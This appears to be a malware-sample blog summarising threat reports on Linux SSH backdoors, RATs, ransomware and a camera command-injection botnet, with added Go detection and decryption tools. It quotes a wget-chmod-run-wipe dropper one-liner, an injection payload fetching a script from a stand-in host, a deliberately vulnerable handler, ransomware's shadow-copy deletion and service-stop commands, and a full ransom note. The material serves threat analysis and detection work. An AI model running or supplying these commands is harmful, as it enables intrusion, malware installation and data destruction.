
Thursday, September 12, 2024

2024-09-12 SUPERSHELL + 2023-03-13 SHELLBOT Targeting Linux SSH servers Samples

 

2024-09-12 Ahnlab: SuperShell malware targeting Linux SSH servers

  • SuperShell is a sophisticated backdoor malware targeting Linux SSH servers, written in the Go language, which allows cross-platform functionality on Linux, Windows, and Android. Created by a Chinese-speaking developer, it operates as a reverse shell, enabling attackers to execute commands remotely on the compromised systems. The attack begins with brute force and dictionary attacks against SSH servers, using weak credentials like "root/password" and "root/123456qwerty." Once access is gained, attackers execute a series of commands to download and install SuperShell, leveraging tools like wget, curl, tftp, and FTP, with download sources often hosted on compromised servers.

  • SuperShell is obfuscated, but it can still be identified through specific internal strings and its runtime behaviour. The installation commands are versatile: they try several staging directories (/tmp, /var/run, /mnt, /root), download a script or binary, mark it executable with chmod +x, run it (./ssh1), and then delete the staging directory's contents (rm -r *) to remove traces. The same fetch, chmod, execute, wipe pattern repeats across multiple command variants with fallback download sources and directories, so that deployment succeeds even if one path fails.
  • Additionally, the attackers often deploy XMRig, a Monero cryptocurrency miner, alongside SuperShell, hinting at a dual-purpose attack: maintaining persistent control over the system while generating illicit cryptocurrency. 

 2023-03-13 Ahnlab: ShellBot Malware Being Distributed to Linux SSH Servers

  • On March 13, 2023, ASEC reported that ShellBot, a Perl-based DDoS bot, is actively targeting Linux SSH servers. The malware exploits weak SSH credentials through brute-force attacks, gaining access to deploy its payload. Once installed, ShellBot connects to a Command and Control (C&C) server via the IRC protocol, enabling attackers to issue commands, steal data, and launch DDoS attacks.
  • Initial Access: Attackers scan for servers with open SSH ports (port 22) and use brute-force tools to guess weak or default credentials.
  • Installation: After gaining access, ShellBot is deployed, often achieving persistence by modifying startup scripts or cron jobs.
  • IRC Protocol: ShellBot uses the IRC protocol for C&C communication, allowing it to receive commands like executing remote tasks or launching DDoS attacks without needing a custom C&C infrastructure.
  • Customization: ShellBot is highly customizable, with variants like "LiGhT’s Modded perlbot v2" offering different capabilities and attack methods tailored by various threat actors.
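Both write-ups start the same way: password guessing against sshd, then a staged install once a login succeeds. The Go program below is an added example of mine, not code from the ASEC articles or from either malware. It parses a constructed auth.log excerpt, flags source IPs whose failure count crosses a threshold and notes when such a source then logs in, and scores a shell command line against the staging pattern described above (fallback directories, download, chmod +x, execute, rm -r *). The log lines, IP addresses, the hypothetical install one-liner and the threshold of five are all constructed for the example.

```go
package main

import (
	"fmt"
	"regexp"
	"sort"
	"strings"
)

// Constructed auth.log excerpt (not from the article): 198.51.100.7 runs a short
// dictionary attack against root and finally gets in; 203.0.113.5 mistyped once.
const sampleAuthLog = `Sep 12 03:14:01 srv sshd[1201]: Failed password for root from 198.51.100.7 port 51234 ssh2
Sep 12 03:14:02 srv sshd[1202]: Failed password for root from 198.51.100.7 port 51235 ssh2
Sep 12 03:14:03 srv sshd[1203]: Failed password for invalid user admin from 198.51.100.7 port 51236 ssh2
Sep 12 03:14:04 srv sshd[1204]: Failed password for root from 198.51.100.7 port 51237 ssh2
Sep 12 03:14:05 srv sshd[1205]: Failed password for root from 198.51.100.7 port 51238 ssh2
Sep 12 03:14:09 srv sshd[1206]: Accepted password for root from 198.51.100.7 port 51240 ssh2
Sep 12 03:20:00 srv sshd[1300]: Failed password for alice from 203.0.113.5 port 40001 ssh2
Sep 12 03:20:04 srv sshd[1301]: Accepted publickey for alice from 203.0.113.5 port 40002 ssh2`

// Hypothetical post-login one-liner mirroring the staging pattern described
// above: fallback directories, fetch, chmod +x, run, wipe the directory.
const sampleInstallCmd = `cd /tmp || cd /var/run || cd /mnt || cd /root; wget http://203.0.113.9/ssh1; chmod +x ssh1; ./ssh1; rm -r *`

var sshdLine = regexp.MustCompile(`^\w{3}\s+\d+ \d\d:\d\d:\d\d \S+ sshd\[\d+\]: (Failed|Accepted) \S+ for (?:invalid user )?(\S+) from (\S+) port \d+`)

// Source aggregates what one client IP did against sshd.
type Source struct {
	Failures  int
	Succeeded string // user of the first Accepted that followed a failure, "" if none
}

// AnalyzeAuthLog folds the log into per-IP statistics.
func AnalyzeAuthLog(log string) map[string]*Source {
	stats := map[string]*Source{}
	for _, line := range strings.Split(log, "\n") {
		m := sshdLine.FindStringSubmatch(line)
		if m == nil {
			continue
		}
		result, user, ip := m[1], m[2], m[3]
		if stats[ip] == nil {
			stats[ip] = &Source{}
		}
		s := stats[ip]
		if result == "Failed" {
			s.Failures++
		} else if s.Failures > 0 && s.Succeeded == "" {
			s.Succeeded = user
		}
	}
	return stats
}

// BruteForceAlerts lists sources with at least threshold failures and marks
// those that eventually logged in; sorted so output is stable.
func BruteForceAlerts(stats map[string]*Source, threshold int) []string {
	var alerts []string
	for ip, s := range stats {
		if s.Failures < threshold {
			continue
		}
		msg := fmt.Sprintf("%s: %d failed logins", ip, s.Failures)
		if s.Succeeded != "" {
			msg += " then SUCCESSFUL LOGIN as " + s.Succeeded
		}
		alerts = append(alerts, msg)
	}
	sort.Strings(alerts)
	return alerts
}

// installStages are the building blocks of the dropper one-liner; a command
// that hits most of them deserves a look even when the binary name changes.
var installStages = map[string]*regexp.Regexp{
	"staging-dir": regexp.MustCompile(`\bcd\s+/(tmp|var/run|mnt|root)\b`),
	"download":    regexp.MustCompile(`\b(wget|curl|tftp|ftp)\b`),
	"chmod":       regexp.MustCompile(`\bchmod\s+(\+x|[0-7]{3,4})\b`),
	"run-dropped": regexp.MustCompile(`(^|[;&|]\s*)\./\S+`),
	"wipe-dir":    regexp.MustCompile(`\brm\s+-r[f]?\s+\*`),
}

// InstallScore returns how many stages a shell command line hits, and which.
func InstallScore(cmd string) (int, []string) {
	var hits []string
	for name, re := range installStages {
		if re.MatchString(cmd) {
			hits = append(hits, name)
		}
	}
	sort.Strings(hits)
	return len(hits), hits
}

func main() {
	for _, a := range BruteForceAlerts(AnalyzeAuthLog(sampleAuthLog), 5) {
		fmt.Println("ALERT", a)
	}
	n, hits := InstallScore(sampleInstallCmd)
	fmt.Printf("install pattern: %d/%d stages matched %v\n", n, len(installStages), hits)
}
```

On a real host, feed it /var/log/auth.log or the output of journalctl -u ssh, and the command lines from auditd or shell history. Raising the threshold cuts noise from users who mistype; the "SUCCESSFUL LOGIN" after a run of failures is the line worth paging on, because it is the moment the install one-liner lands.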

Download

2024-09-19 X-WORM RAT (Phishing) Samples

2024-09-12 0day in {REA_TEAM}: The X-Worm malware is being spread through a phishing email
by m4n0w4r


More about X-Worm: Malpedia: X-Worm, malware with a wide range of capabilities, from RAT to ransomware.

  • Phishing Tactics: the attacker sent an email containing a shortened link that, when clicked, downloaded a file named Itinerary.doc_.zip.
  • The .zip archive contained a shortcut file (.lnk).
  • The .lnk downloaded and ran a batch script (output4.bat), which used bitsadmin to fetch the payload into the %temp% folder under the name svchost.com, chosen to resemble the legitimate svchost.exe.
  • svchost.com was triaged with DiE and ExeInfo, which identified it as a .NET executable from the XWorm family protected with .NET Reactor.
  • The code was heavily obfuscated; NETReactorSlayer partially deobfuscated it.
  • String decryption: the sample derives its AES key from an MD5 hash, Base64-decodes each encrypted string, and decrypts it with AES in ECB mode.
  • The malware's configuration included the C2 host (cyberdon1[.]duckdns[.]org), port (1500), and other parameters such as a Telegram bot token and chat ID.
  • XWorm Version: the analysed build reports version 5.6.
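To make the string-decryption step concrete, here is an added Go example of mine (not m4n0w4r's code and not XWorm's). It reproduces the scheme the bullet describes: MD5 to derive the key, Base64 to unwrap, AES in ECB mode to decrypt. The 32-byte key layout (the MD5 digest copied at offsets 0 and 15) is taken from earlier public XWorm analyses and is an assumption here, as is the mutex value EXAMPLE_MUTEX; the program encrypts the page's own config values so it can be run offline, then decrypts them back.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/md5"
	"encoding/base64"
	"errors"
	"fmt"
)

// xwormKey follows the key derivation that public XWorm analyses describe:
// the MD5 of the sample's mutex string is copied into a 32-byte buffer at
// offsets 0 and 15 (bytes 15..30 overlap, byte 31 stays zero) and used as an
// AES-256 key. This is an assumption from those write-ups, not from the
// article summarised above.
func xwormKey(mutex string) []byte {
	sum := md5.Sum([]byte(mutex))
	key := make([]byte, 32)
	copy(key[0:16], sum[:])
	copy(key[15:31], sum[:])
	return key
}

func pkcs7Pad(b []byte, size int) []byte {
	n := size - len(b)%size
	return append(b, bytes.Repeat([]byte{byte(n)}, n)...)
}

func pkcs7Unpad(b []byte, size int) ([]byte, error) {
	if len(b) == 0 || len(b)%size != 0 {
		return nil, errors.New("ciphertext is not a whole number of blocks")
	}
	n := int(b[len(b)-1])
	if n == 0 || n > size || !bytes.Equal(b[len(b)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, errors.New("bad PKCS#7 padding (wrong key or corrupted data)")
	}
	return b[:len(b)-n], nil
}

// ecb runs the block cipher over each 16-byte block independently. Go offers
// no ECB helper on purpose; writing it out shows the weakness: no IV and no
// chaining, so equal plaintext blocks produce equal ciphertext blocks.
func ecb(block cipher.Block, in []byte, decrypt bool) []byte {
	out := make([]byte, len(in))
	for i := 0; i < len(in); i += block.BlockSize() {
		if decrypt {
			block.Decrypt(out[i:], in[i:])
		} else {
			block.Encrypt(out[i:], in[i:])
		}
	}
	return out
}

// EncryptBytes builds test data the way the malware's builder would.
func EncryptBytes(mutex string, plain []byte) []byte {
	block, _ := aes.NewCipher(xwormKey(mutex)) // 32-byte key, cannot fail
	return ecb(block, pkcs7Pad(plain, aes.BlockSize), false)
}

// EncryptString is EncryptBytes plus the Base64 layer seen in the sample.
func EncryptString(mutex, plain string) string {
	return base64.StdEncoding.EncodeToString(EncryptBytes(mutex, []byte(plain)))
}

// DecryptString is the analyst-side routine: Base64 -> AES-ECB -> unpad.
func DecryptString(mutex, b64 string) (string, error) {
	ct, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return "", err
	}
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return "", errors.New("ciphertext length is not a multiple of 16")
	}
	block, _ := aes.NewCipher(xwormKey(mutex))
	pt, err := pkcs7Unpad(ecb(block, ct, true), aes.BlockSize)
	if err != nil {
		return "", err
	}
	return string(pt), nil
}

func main() {
	mutex := "EXAMPLE_MUTEX" // hypothetical; a real sample's value is read from its config
	for _, s := range []string{"cyberdon1.duckdns.org", "1500"} {
		enc := EncryptString(mutex, s)
		dec, err := DecryptString(mutex, enc)
		fmt.Printf("%-22s -> %s -> %q %v\n", s, enc, dec, err)
	}
}
```

Two things matter for the analyst. ECB is deterministic and unchained, so the same config string yields the same Base64 blob in every build that shares a mutex, which makes the encrypted strings themselves usable as indicators. And a wrong mutex usually surfaces as a PKCS#7 padding error rather than as plausible-looking garbage, a quick way to confirm the key material you extracted is the right one.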

Download

2023-11-23 BEAVERTAIL and INVISIBLE_FERRET Lazarus Group Malware Samples

2023-11-23 Palo Alto Unit42: Hacking Employers and Seeking Employment: Two Job-Related

This is a 2023 article by Unit42 covering two cyber campaigns, "Contagious Interview" (CL-STA-0240) and "Wagemole" (CL-STA-0241), linked to the Lazarus group (North Korea). 

There is a more recent campaign, VMCONNECT, described by ReversingLabs here: 2024-09-10 Fake recruiter coding tests target devs with malicious Python packages, but I don't have samples for that one.

 These campaigns target job-seeking activities to deploy malware and conduct espionage. 

Contagious Interview (CL-STA-0240):
  • The campaign targets software developers by posing as employers and convincing them to download malicious NPM packages during fake job interviews. The malware, BeaverTail and InvisibleFerret, is cross-platform, running on Windows, Linux, and macOS.

  • BeaverTail: a JavaScript-based malware that steals cryptocurrency wallet information and loads the second-stage payload, InvisibleFerret.

  • InvisibleFerret: a Python-based backdoor with fingerprinting, remote control, keylogging, and browser credential theft capabilities. It communicates with its C2 server using JSON-formatted messages and supports commands for data exfiltration and deployment of additional malware.

  • The threat actors use GitHub to host malicious NPM packages, creating accounts with minimal activity to avoid detection.

Wagemole (CL-STA-0241):
  • Wagemole involves North Korean actors using fake identities to apply for remote IT jobs, likely to funnel wages to North Korea's weapons programs and potentially conduct espionage.

  • Exposed Infrastructure: Researchers found resumes, interview scripts, and other fraudulent materials on GitHub. These documents impersonate IT professionals and aim to gain unauthorized employment at US companies.

Download

Tuesday, September 10, 2024

2024-09-10 KIMSUKY (North Korean APT) Sample (Sakai @sakaijjang - Terms and Conditions.msc)


 2024-09-10 Sakai @sakaijjang: Malware created by Kimsuky - Terms and conditions (Korean: 이용 약관).msc (2024.9.6) - Kimsuky (North Korea) - Terms and Conditions.msc

by https://x.com/sakaijjang?lang=en 

Article translation in English 

More about Kimsuky: 2020-10-27 CISA North Korean Advanced Persistent Threat Focus

  • The malware is delivered as a file named "Terms and conditions.msc" (a Microsoft Management Console saved-console file) containing embedded PowerShell commands.
  • The PowerShell runs in a hidden window (-WindowStyle Hidden), so the user sees nothing.
  • The script uses Invoke-Expression (iex) to execute code and Invoke-WebRequest (iwr) to download a second-stage script from hxxps://0x0(.)st/Xyl7(.)txt.
  • The downloaded data is hex-encoded and is decoded into a byte array.
  • The decoded bytes are first written as an MP3 file (e.g., vBqz.mp3) in the system's Public Documents folder.
  • The MP3 file is then renamed to an executable (e.g., vBqz.exe); the media extension only serves to get the payload onto disk.
  • The executable is launched through conhost.exe in the background, using Start-Process with the -NoNewWindow option so that no console appears.
  • File Camouflage: the MP3 extension disguises the executable while it is downloaded and written.
  • Stealthy Execution: using built-in utilities such as conhost.exe and hidden windows helps evade both the user and security tooling.
  • Command-and-Control (C2) Infrastructure: hosting the payload on a public file-sharing site (0x0.st) gives the operators a flexible, easily reconfigurable distribution point.
  • Hexadecimal Encoding: the encoding is a light obfuscation; decoding the blob exposes the real payload for analysis.
  • Potential Variants: other versions may differ in payload or C2 URLs; detection rules such as YARA should be maintained and updated accordingly.
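To turn the chain above into something checkable, here is an added Go example of mine, not code from Sakai's article or from the Kimsuky script. It decodes a hex-encoded blob the way the script does, verifies that the result is a PE file by following the DOS header to the PE signature, and walks a folder flagging files whose media extension hides executable content. The sample payload is a constructed minimal PE header (not a real program), the folder is a temporary directory standing in for Public Documents, and only the file name vBqz.mp3 is reused from the article.

```go
package main

import (
	"bytes"
	"encoding/binary"
	"encoding/hex"
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// constructedPE stands in for the dropped executable: an MZ header whose
// e_lfanew field (offset 0x3C) points at a "PE\0\0" signature. It is not a
// runnable program, only enough header for the checks below.
func constructedPE() []byte {
	b := make([]byte, 0x44)
	copy(b, "MZ")
	binary.LittleEndian.PutUint32(b[0x3C:], 0x40)
	copy(b[0x40:], "PE\x00\x00")
	return b
}

// SampleHexPayload is what the staging script would fetch: the file as hex
// text, wrapped across lines the way a pasted blob often is.
func SampleHexPayload() string {
	h := hex.EncodeToString(constructedPE())
	return h[:40] + "\n" + h[40:80] + "\r\n" + h[80:]
}

// DecodeHexPayload mirrors the script's decode step: drop whitespace, then
// turn the hex string back into raw bytes.
func DecodeHexPayload(text string) ([]byte, error) {
	clean := strings.Map(func(r rune) rune {
		if strings.ContainsRune(" \t\r\n", r) {
			return -1
		}
		return r
	}, text)
	return hex.DecodeString(clean)
}

// LooksLikePE checks the DOS magic and follows e_lfanew to the PE signature,
// so a file that merely starts with "MZ" is not enough.
func LooksLikePE(b []byte) bool {
	if len(b) < 0x40 || !bytes.HasPrefix(b, []byte("MZ")) {
		return false
	}
	off := int(binary.LittleEndian.Uint32(b[0x3C:0x40]))
	return off >= 0 && off+4 <= len(b) && bytes.Equal(b[off:off+4], []byte("PE\x00\x00"))
}

// mediaExts are extensions a Windows executable has no business carrying.
var mediaExts = map[string]bool{".mp3": true, ".wav": true, ".jpg": true, ".png": true, ".pdf": true, ".txt": true}

// DisguisedExecutable is the hunting check: PE content behind a media name.
func DisguisedExecutable(name string, content []byte) bool {
	return mediaExts[strings.ToLower(filepath.Ext(name))] && LooksLikePE(content)
}

// ScanDir applies the check to every regular file under dir, reading only
// the first 4 KiB of each so large media files cost little.
func ScanDir(dir string) ([]string, error) {
	var hits []string
	err := filepath.Walk(dir, func(path string, info os.FileInfo, err error) error {
		if err != nil || !info.Mode().IsRegular() {
			return err
		}
		f, err := os.Open(path)
		if err != nil {
			return err
		}
		defer f.Close()
		head := make([]byte, 4096)
		n, _ := f.Read(head)
		if DisguisedExecutable(path, head[:n]) {
			hits = append(hits, path)
		}
		return nil
	})
	return hits, err
}

func main() {
	dir, _ := os.MkdirTemp("", "pubdocs") // stand-in for the Public Documents folder
	defer os.RemoveAll(dir)
	raw, _ := DecodeHexPayload(SampleHexPayload())
	os.WriteFile(filepath.Join(dir, "vBqz.mp3"), raw, 0o644)                  // name taken from the article
	os.WriteFile(filepath.Join(dir, "song.mp3"), []byte("ID3\x03\x00"), 0o644) // a real-looking MP3 header
	hits, err := ScanDir(dir)
	fmt.Println("disguised executables:", hits, err)
}
```

The check deliberately follows e_lfanew rather than stopping at "MZ", because plenty of non-PE data happens to start with those two bytes. Pointing it at user-writable folders (Public Documents, %TEMP%, Downloads) catches the window between the .mp3 write and the rename to .exe, and it keeps working if a variant picks a different extension or file name.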

Download

2024-09-03 LUXY Ransomware / Stealer Sample

 2024-09-03 K7 Security Labs: Luxy: A Stealer and a Ransomware in one




  • The sample is a .NET 32-bit executable, enforcing single-instance execution via a mutex and ensuring network connectivity before proceeding. It also implements anti-VM checks using System UUIDs, process names, and other system identifiers to evade sandbox environments.
  • Browser Data Extraction: Utilizes methods like GETENCRYPTIONKEY to extract and decrypt stored passwords and cookies from various browsers.
  • Cryptocurrency Wallet Theft: Targets wallets such as Zcash, Ethereum, and others, copying wallet files to a text file for exfiltration.
  • Session File Theft: Extracts Minecraft session files, logging them in a source.txt file, potentially compromising user authentication.
  • Roblox Cookie Theft: Steals cookies from the registry and browsers using PowerShell commands.
  • File Encryption: encrypts every file in the directory the malware runs from with AES and renames them afterwards. The write-up calls it AES-256, but the reported key and IV lengths are both 128 bits, which is AES-128 with a 16-byte IV; the plaintext is padded to the AES block size before encryption.
  • Ransom Note: After encryption, a ransom note is dropped, informing the victim of the encryption and providing instructions to obtain the decryption key.

The Ransom note reads: 

ATTENTION!

Don't worry, you can return all your files!

All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.

The only method of recovering files is to purchase decrypt tool and unique key for you.

This software will decrypt all your encrypted files.

Price of private key and decrypt software is $980.

Discount 50% available if you contact us first 72 hours, that's price for you is $490.

Please note that you'll never restore your data without payment.

To get this software and key you need join our server discord:

discord.gg/

Personal ID:

Download

Saturday, September 7, 2024

2024-09-05 SHRINKLOCKER (Bitlocker) Ransomware Samples

2024-09-05 Splunk: ShrinkLocker Malware: Abusing BitLocker to Lock Your Data

ShrinkLocker is a newly discovered ransomware strain that abuses BitLocker, a legitimate Windows feature, to lock users out of their systems. Unlike traditional ransomware it carries no encryption routine of its own: it enables BitLocker full-volume encryption and removes the default key protectors, so the victim has no way to unlock the volume. The script starts by identifying the operating system version to decide whether the host is a suitable target. It then modifies registry settings, in particular those controlling Remote Desktop Protocol (RDP) access and the BitLocker policy that normally requires a Trusted Platform Module (TPM), so that BitLocker can be turned on without one. After disabling the existing BitLocker key protectors, ShrinkLocker shrinks every non-boot partition by 100 MB, creates and formats new partitions in the freed space, and reinstalls the boot files onto them, leaving the original system unbootable and potentially irreparable. The key protector it generates, along with host details, is exfiltrated to a command-and-control server, and the script tries to erase its traces by deleting logs, firewall rules, and scheduled tasks.



2024-08-30 Cicada ESXi Ransomware Sample

 



Cicada3301, a ransomware group first detected in June 2024, appears to be either a rebrand of or a derivative from the ALPHV (BlackCat) ransomware, operated under a ransomware-as-a-service (RaaS) model. The ransomware is written in Rust, targets both Windows and Linux/ESXi environments, and uses ChaCha20 for file encryption. Technical analysis shows several similarities with ALPHV: near-identical command structures for shutting down VMs and removing snapshots, and a similar file-naming convention. The ESXi sample is an ELF binary; its Rust origin is confirmed by string references and by the contents of the .comment section.

Key command-line parameters include sleep, which delays execution, and ui, which displays encryption progress on screen. The key parameter is mandatory: if it is missing or wrong, the ransomware exits. The main function, linux_enc, starts by generating a random ChaCha20 key with OsRng. Files larger than 100 MB are encrypted in parts; smaller files are encrypted in full. The per-file ChaCha20 key is then wrapped with an embedded RSA public key and appended, together with the chosen file extension, to the end of the encrypted file.

Initial access appears to be facilitated by the Brutus botnet: the threat actors used stolen or brute-forced credentials to get in via ScreenConnect, and the IP address seen in the attack is tied to Brutus, raising the possibility of a direct connection between the botnet operators and Cicada3301. The key check doubles as a decryption test: an encoded and encrypted ransom note stored in the binary is decrypted with the supplied key, and only if that succeeds does execution continue.


Download


Download. (Email me if you need the password scheme)



File Information

63e0d4e861048f581c9e5c64b28a053eb0023d58eebf2b943868d5f68a67a8b7 esxi

The article didn't include any hashes, only the YARA rule. While this sample doesn't trigger a match with the rule, I believe it's the same malware

Tuesday, September 3, 2024

2024-09-02 ABYSS Ransomware Windows and Linux Samples




Abyss Ransomware, first identified in 2023, is a sophisticated ransomware strain targeting both Windows and Linux systems, with a specific focus on VMware ESXi environments. It employs advanced encryption techniques, multi-extortion tactics, and strategic network infiltration to disrupt operations across various sectors, including finance, healthcare, and technology.

Key Characteristics:

  • Target Platforms: Windows and Linux, with particular focus on VMware ESXi hosts.
  • Encryption: Salsa20; encrypted files receive the .abyss or .crypt extension.
  • Initial Access Vectors: phishing emails, weak SSH configurations, and exploitation of known vulnerabilities in exposed servers.
  • Multi-Extortion Tactics: files are encrypted and data is exfiltrated, with the threat of publication on a TOR-based leak site if the ransom is not paid.

Windows Variant:

  • Service Termination: stops services that hold files open (e.g., MSSQL, Exchange) so that encryption succeeds.
  • Recovery Inhibition: alters the boot configuration to disable Windows recovery options.
  • File Encryption: Salsa20; the ransom note WhatHappened.txt is dropped in each directory.
  • Obfuscation: written in C++, with techniques to evade detection and hinder forensic analysis.

Linux Variant:

  • VMware ESXi Targeting: uses esxcli to enumerate and shut down virtual machines before encrypting their files.
  • Selective Encryption: skips critical system directories so the host stays partially functional.
  • Persistence: runs as a daemon process so the ransomware stays active after a reboot.


Monday, September 2, 2024

2022-2024 North Korea Citrine Sleet /Lazarus FUDMODULE ( BYOVD ) Rootkit Samples


2024-08-30 Microsoft: North Korean threat actor Citrine Sleet exploiting Chromium zero-day 

2024-03-01 Lazarus group operations — A deep dive into FudModule Rootkit by Lucas Mancilha

2024-08-28 CORONA MIRAI Botnet Spreads via Zero-Day (CVE-2024-7029) - command injection vulnerability found in the brightness function of AVTECH closed-circuit television (CCTV) Samples






Akamai's Security Intelligence and Response Team (SIRT) has identified a new botnet campaign exploiting multiple vulnerabilities, including a zero-day vulnerability, CVE-2024-7029, discovered by Aline Eliovich. This command injection vulnerability exists in the brightness function of AVTECH IP camera devices, allowing for remote code execution (RCE). The botnet spreads a Mirai variant with strings referencing the COVID-19 virus, leveraging this vulnerability to infect systems.

  • CVE-2024-7029: This vulnerability affects AVTECH IP camera models with firmware versions up to AVM1203 FullImg-1023-1007-1011-1009. The flaw allows attackers to inject commands through the "brightness" parameter in the device's web interface, leading to remote code execution.
  • Exploitation: The botnet campaign not only exploits CVE-2024-7029 but also targets older, unpatched vulnerabilities, such as a Hadoop YARN RCE, CVE-2014-8361, and CVE-2017-17215. These vulnerabilities, though older, remain effective due to their widespread use in unpatched systems.
  • Spread of Mirai Variant: The attack chain involves exploiting the identified vulnerabilities to download and execute a variant of the Mirai botnet. This variant, known as Corona Mirai, connects to command-and-control servers and spreads across networks, particularly through Telnet on ports 23, 2323, and 37215.
  • Affected Devices: the vulnerability primarily impacts AVTECH IP camera models, specifically those running the AVM1203 firmware versions mentioned above. Although these models are discontinued, they are still in use in critical infrastructure, including transportation authorities.

Affected Models:

  • AVTECH IP Cameras: Specifically models running up to AVM1203 firmware versions FullImg-1023-1007-1011-1009.
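The advisory describes the flaw only at the level of "command injection through the brightness parameter". The Go program below is an added example of mine, not AVTECH's firmware or Akamai's code: it puts a hypothetical vulnerable handler (raw value spliced into a shell command line) beside a hardened one (bounded integer, argv with no shell), and adds a hunting check that pulls the brightness parameter out of constructed web-server request lines and flags shell metacharacters. The CGI path, the setbrightness helper and the request lines are all invented for the example.

```go
package main

import (
	"errors"
	"fmt"
	"net/url"
	"strconv"
	"strings"
)

// VulnerableBrightnessCommand models the bug class, not AVTECH's code: the raw
// parameter is spliced into a command line that the firmware would hand to
// sh -c. The helper path is invented.
func VulnerableBrightnessCommand(brightness string) string {
	return "/usr/bin/setbrightness " + brightness
}

// HardenedBrightnessArgv parses the value as a bounded integer and returns an
// argv slice for a shell-free exec, so metacharacters never reach sh.
func HardenedBrightnessArgv(brightness string) ([]string, error) {
	n, err := strconv.Atoi(strings.TrimSpace(brightness))
	if err != nil || n < 0 || n > 255 {
		return nil, errors.New("brightness must be an integer in 0..255")
	}
	return []string{"/usr/bin/setbrightness", strconv.Itoa(n)}, nil
}

// shellMeta are the characters an injected value needs to escape the intended
// argument; a genuine brightness value never contains any of them.
const shellMeta = ";&|$<>(){}\x60\\\n"

// brightnessParam extracts the decoded brightness value from a raw query
// string. It is hand-rolled on purpose: url.ParseQuery rejects any pair that
// contains a raw ';', which would silently drop exactly the requests we hunt.
func brightnessParam(rawQuery string) string {
	for _, kv := range strings.Split(rawQuery, "&") {
		k, v, _ := strings.Cut(kv, "=")
		if k != "brightness" {
			continue
		}
		if dec, err := url.QueryUnescape(v); err == nil {
			return dec
		}
		return v
	}
	return ""
}

// InjectionAttempt takes a request line ("GET /path?query HTTP/1.1") and
// reports whether its brightness parameter carries shell metacharacters.
func InjectionAttempt(requestLine string) (bool, string) {
	fields := strings.Fields(requestLine)
	if len(fields) < 2 {
		return false, ""
	}
	_, query, _ := strings.Cut(fields[1], "?")
	v := brightnessParam(query)
	return strings.ContainsAny(v, shellMeta), v
}

// Constructed access-log request lines (paths invented, not the advisory's):
// a benign setting, an attempt to drop a downloader into /tmp, and a request
// without the parameter at all.
var sampleRequests = []string{
	"GET /cgi-bin/camera.cgi?action=set&brightness=80 HTTP/1.1",
	"GET /cgi-bin/camera.cgi?action=set&brightness=1%3Bcd+/tmp%3Bwget+http://203.0.113.9/bot.sh HTTP/1.1",
	"GET /cgi-bin/camera.cgi?action=get HTTP/1.1",
}

// ScanRequests returns the decoded payload of every injection attempt.
func ScanRequests(lines []string) []string {
	var hits []string
	for _, l := range lines {
		if bad, v := InjectionAttempt(l); bad {
			hits = append(hits, v)
		}
	}
	return hits
}

func main() {
	for _, l := range sampleRequests {
		bad, v := InjectionAttempt(l)
		fmt.Printf("injection=%-5v brightness=%q\n", bad, v)
	}
	payload := "1;wget http://203.0.113.9/bot.sh"
	fmt.Println("vulnerable:", VulnerableBrightnessCommand(payload))
	if _, err := HardenedBrightnessArgv(payload); err != nil {
		fmt.Println("hardened:   rejected:", err)
	}
}
```

The fix is the usual one for this bug class: the value is an integer, so parse it as one and pass it as a separate argv element, never through a shell. For hunting on the detection side, note that url.ParseQuery in Go drops any key/value pair containing a raw semicolon, the very character a command injection leans on, so a detector built on it would miss the attack unless the attacker happened to URL-encode it.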


Download

2024-08-29 ASYNCRAT Samples



2024-08-29 Esentire: Exploring AsyncRAT and Infostealer Plugin Delivery Through Phishing Emails

eSentire's Threat Response Unit (TRU) discovered an AsyncRAT infection that was delivered through a Windows Script File (.wsf) via email. The malicious .wsf file, named “SummaryForm_,” downloaded a VBScript from a remote server, which then fetched a fake image file. 
This file was actually a ZIP archive that, once extracted, ran additional scripts to establish persistence on the system. The scripts created a scheduled task to execute the AsyncRAT payload repeatedly, making it difficult to detect and remove. The payload was injected into the RegAsm.exe process using a DLL to further evade detection.



Additionally, this version of AsyncRAT included an infostealer plugin designed to exfiltrate data from popular web browsers like Chrome and Firefox, as well as cryptocurrency wallet extensions such as MetaMask and Coinbase. The attack highlights the use of multiple stages and obfuscation techniques to maintain persistence and steal sensitive information from the infected system.



Download

2024-08-29 UNDERGROUND Ransomware Samples





The Underground ransomware is likely spread by the RomCom group (also known as Storm-0978). The group exploits the Microsoft Office and Windows HTML RCE vulnerability (CVE-2023-36884). Other methods, such as phishing emails and access via Initial Access Brokers (IABs), may also be used.

  • Shadow Copy Deletion: removes all Volume Shadow Copies so files cannot be restored from them:
      vssadmin.exe delete shadows /all /quiet
  • RDP Session Limits: sets MaxDisconnectionTime to 14 days (1209600000 ms) so that disconnected Remote Desktop sessions are kept alive, preserving the att
ackers' access:
      reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v MaxDisconnectionTime /t REG_DWORD /d 1209600000 /f
  • SQL Server Service Stop: halts the MS SQL Server service, releasing its locked database files for encryption and disrupting operations:
      net.exe stop MSSQLSERVER /f /m
  • Ransom Note Deployment: drops a ransom note named "!!readme!!!.txt" in directories containing encrypted files.
  • File Encryption: The ransomware encrypts files without altering their extensions, making it harder to visually identify encrypted files. It avoids encrypting critical system files (e.g., .sys, .exe, .dll) to maintain system functionality.
  • Log and File Deletion: It creates and runs a script (temp.cmd) to delete the original ransomware file and clear Windows Event logs, complicating forensic analysis.
  • Data Leak Site: The ransomware group maintains a site where they post stolen data from their victims, spanning industries such as construction, pharmaceuticals, and manufacturing. As of July 2024, they have listed 16 victims.
  • Telegram Channel: The group also uses a Telegram channel to distribute stolen data, with links to files hosted on Mega, a cloud storage service.
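The commands quoted above are cheap to detect individually but noisy on their own (backup software also deletes shadow copies). The Go program below is an added example of mine, not code from the write-up summarised above or from the ransomware: it classifies process-creation command lines against those commands, plus the event-log clearing the write-up mentions (assumed here to be done with wevtutil, which the article does not name), and raises one alert per host when two distinct techniques occur within a short window. The events, hostnames and timestamps are constructed.

```go
package main

import (
	"fmt"
	"regexp"
	"sort"
	"time"
)

// Event is a minimal process-creation record (Sysmon event 1 / Security 4688).
type Event struct {
	Time        time.Time
	Host        string
	CommandLine string
}

// techniques pair a tag with a pattern. The first three follow the commands
// quoted in the write-up; the last covers the event-log clearing it mentions,
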